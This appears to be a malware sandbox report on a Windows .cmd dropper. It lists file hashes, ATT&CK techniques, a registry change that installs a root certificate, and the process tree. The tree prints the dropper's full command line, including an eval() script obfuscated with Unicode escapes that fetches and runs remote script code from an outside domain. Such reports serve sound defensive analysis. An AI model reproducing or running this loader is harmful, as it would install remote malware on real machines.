a7773028de935f6c3060398256f1990d75ba519509e403c160af0c4079b6d4b1

General

Target

AssinaturaAutentique089.998686.95887.cmd
Size

835B
MD5

7e73323d8389accd3a107c75cc2ab959
SHA1

9561365e1e2d7f6e3ecc838b3bacc2b5f1aa1da8
SHA256

7af4b5096515aa03b9aed7972229f143b67c73f5654bdf82fdd91be90b638f6e
SHA512

0750f973200c505706119234c676a96877c055cc3d90e432a56be6abc39dba10c36543a406cd9d364b3f3eebdba3395a312e9d1f80b538f581a1a6f9b7f9977c

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	1400	WScript.exe
6	1400	WScript.exe
8	1400	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies system certificate store 2 TTPs 2 IoCs

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	WScript.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1736 wrote to memory of 1752	1736	cmd.exe	27
PID 1736 wrote to memory of 1752	1736	cmd.exe	27
PID 1736 wrote to memory of 1752	1736	cmd.exe	27
PID 1752 wrote to memory of 1400	1752	cmd.exe	29
PID 1752 wrote to memory of 1400	1752	cmd.exe	29
PID 1752 wrote to memory of 1400	1752	cmd.exe	29

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\AssinaturaAutentique089.998686.95887.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:1736
- C:\Windows\system32\cmd.exe
  cmd C:\Windows\system32\cmd.exe /V/D/c "md C:\GYy7OLJ\>nul 2>&1 &&s^eT RCWG=C:\GYy7OLJ\^GYy7OLJ.^Js&&echo eval('\u0076\u0061\u0072\u0020\u0043\u0066\u0044\u0061\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0066\u0044\u0061\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022\u003a\u0068\u0022\u003b\u0045\u0066\u0044\u0061\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043\u0066\u0044\u0061\u002b\u0044\u0066\u0044\u0061\u002b\u0045\u0066\u0044\u0061\u002b\u0022\u002f\u002f\u0034\u0070\u0069\u0075\u0065\u0038\u002e\u0061\u0064\u006d\u0069\u006e\u0077\u0065\u0062\u0067\u0065\u0073\u0074\u0061\u006f\u002e\u0076\u006c\u0061\u0064\u0069\u006d\u0069\u0072\u002e\u0072\u0075\u002f\u003f\u0031\u002f\u0022\u0029\u003b'); >!RCWG!&&ca^ll !RCWG!"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1752
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\GYy7OLJ\GYy7OLJ.Js"
    3⤵
    - Blocklisted process makes network request
    - Modifies system certificate store
    PID:1400

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

Modify Registry

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\GYy7OLJ\GYy7OLJ.Js

Filesize
714B

MD5
add3f002b4804beb5f6b0e0575158538

SHA1
ee4b3d15b685958ab96934d900c4c34ecee65697

SHA256
4838b1736d99985ac477bc06ed4339ffb8c1f1c57d585d2d7a74e7d6637efe4f

SHA512
7cd47449fc7346091ec3fe8fee8c3d79a5badc41bdfceae5cd92a48409bd2a70f013992f60ba33e79b364031e4c95ebd7fe8b85e464b6c5fef092f57c6082d8b

Download Submit

Analysis

Sharing